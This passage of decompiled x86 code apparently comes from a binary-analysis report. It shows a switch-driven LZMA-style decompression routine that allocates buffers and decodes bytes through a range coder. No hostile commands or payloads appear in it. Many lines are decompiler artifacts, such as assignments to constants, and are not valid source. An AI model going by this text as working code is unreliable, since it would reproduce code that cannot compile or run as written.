                                                          									if(_t538 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									L2:
                                                          									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                          										case 0:
                                                          											L3:
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											L4:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											_t538 =  *( *(_t644 - 0x70));
                                                          											if(_t538 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											L5:
                                                          											_t542 = _t538 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t581);
                                                          											_push(9);
                                                          											_pop(_t582);
                                                          											_t638 = _t542 / _t581;
                                                          											_t544 = _t542 % _t581 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t633 = _t544 % _t582 & 0x000000ff;
                                                          											 *(_t644 - 0x3c) = _t633;
                                                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                          												L10:
                                                          												if(_t641 == 0) {
                                                          													L12:
                                                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t641 = _t641 - 1;
                                                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                          												} while (_t641 != 0);
                                                          												goto L12;
                                                          											}
                                                          											L6:
                                                          											if( *(_t644 - 4) != 0) {
                                                          												GlobalFree( *(_t644 - 4));
                                                          											}
                                                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t644 - 4) = _t538;
                                                          											if(_t538 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t644 - 0x6c);
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L157:
                                                          												 *(_t644 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											L14:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											_t45 = _t644 - 0x48;
                                                          											 *_t45 =  *(_t644 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t644 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											L16:
                                                          											_t550 =  *(_t644 - 0x40);
                                                          											if(_t550 ==  *(_t644 - 0x74)) {
                                                          												L20:
                                                          												 *(_t644 - 0x48) = 5;
                                                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											L17:
                                                          											 *(_t644 - 0x74) = _t550;
                                                          											if( *(_t644 - 8) != 0) {
                                                          												GlobalFree( *(_t644 - 8));
                                                          											}
                                                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                          											 *(_t644 - 8) = _t538;
                                                          											if(_t538 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                          											 *(_t644 - 0x84) = 6;
                                                          											 *(_t644 - 0x4c) = _t557;
                                                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                          											goto L132;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t644 - 0x6c);
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L158:
                                                          												 *(_t644 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											L22:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											_t67 = _t644 - 0x70;
                                                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                          											if( *(_t644 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t559 =  *_t642;
                                                          											_t626 = _t559 & 0x0000ffff;
                                                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                          											if( *(_t644 - 0xc) >= _t596) {
                                                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                          												 *(_t644 - 0x40) = 1;
                                                          												_t560 = _t559 - (_t559 >> 5);
                                                          												__eflags = _t560;
                                                          												 *_t642 = _t560;
                                                          											} else {
                                                          												 *(_t644 - 0x10) = _t596;
                                                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                          											}
                                                          											if( *(_t644 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											} else {
                                                          												goto L137;
                                                          											}
                                                          										case 5:
                                                          											L137:
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L168:
                                                          												 *(_t644 - 0x88) = 5;
                                                          												goto L170;
                                                          											}
                                                          											L138:
                                                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          											L139:
                                                          											_t537 =  *(_t644 - 0x84);
                                                          											L140:
                                                          											 *(_t644 - 0x88) = _t537;
                                                          											goto L1;
                                                          										case 6:
                                                          											L25:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L36:
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											L26:
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												L35:
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												L32:
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											L66:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												L68:
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											L67:
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											goto L132;
                                                          										case 8:
                                                          											L70:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xa;
                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x38);
                                                          												__ecx =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                          												 *(__ebp - 0x84) = 9;
                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          											}
                                                          											goto L132;
                                                          										case 9:
                                                          											L73:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L90;
                                                          											}
                                                          											L74:
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											L75:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t259;
                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          											goto L76;
                                                          										case 0xa:
                                                          											L82:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L84:
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											L83:
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L89;
                                                          										case 0xb:
                                                          											L85:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L89:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L90:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L99:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L164:
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											L100:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t334 = __ebp - 0x70;
                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t334;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L101;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L159:
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											L38:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											L40:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												L45:
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L160:
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											L47:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												L49:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													L53:
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L161:
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											L59:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												L65:
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L109:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L165:
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											L110:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t365 = __ebp - 0x70;
                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t365;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L111;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											goto L132;
                                                          										case 0x12:
                                                          											L128:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L131:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												 *(__ebp - 0x84) = 0x13;
                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                          												L132:
                                                          												 *(_t644 - 0x54) = _t642;
                                                          												goto L133;
                                                          											}
                                                          											L129:
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											__eflags = __eax;
                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          											goto L130;
                                                          										case 0x13:
                                                          											L141:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L143:
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												L144:
                                                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                          												L145:
                                                          												 *(_t644 - 0x50) = 1;
                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          												goto L149;
                                                          											}
                                                          											L142:
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											L130:
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											 *(__ebp - 0x40) = 3;
                                                          											goto L144;
                                                          										case 0x14:
                                                          											L156:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											while(1) {
                                                          												L140:
                                                          												 *(_t644 - 0x88) = _t537;
                                                          												goto L1;
                                                          											}
                                                          										case 0x15:
                                                          											L91:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L120;
                                                          										case 0x16:
                                                          											goto L0;
                                                          										case 0x17:
                                                          											while(1) {
                                                          												L145:
                                                          												 *(_t644 - 0x50) = 1;
                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          												goto L149;
                                                          											}
                                                          										case 0x18:
                                                          											goto L146;
                                                          										case 0x19:
                                                          											L94:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												L98:
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L119:
                                                          												_t393 = __ebp - 0x2c;
                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t393;
                                                          												L120:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													L166:
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          													goto L170;
                                                          												}
                                                          												L121:
                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                          													goto L171;
                                                          												}
                                                          												L122:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          												__eax =  *(__ebp - 0x30);
                                                          												_t400 = __ebp - 0x60;
                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          												__eflags =  *_t400;
                                                          												goto L123;
                                                          											}
                                                          											L95:
                                                          											__ecx = __ebx;
                                                          											__eax = __ebx;
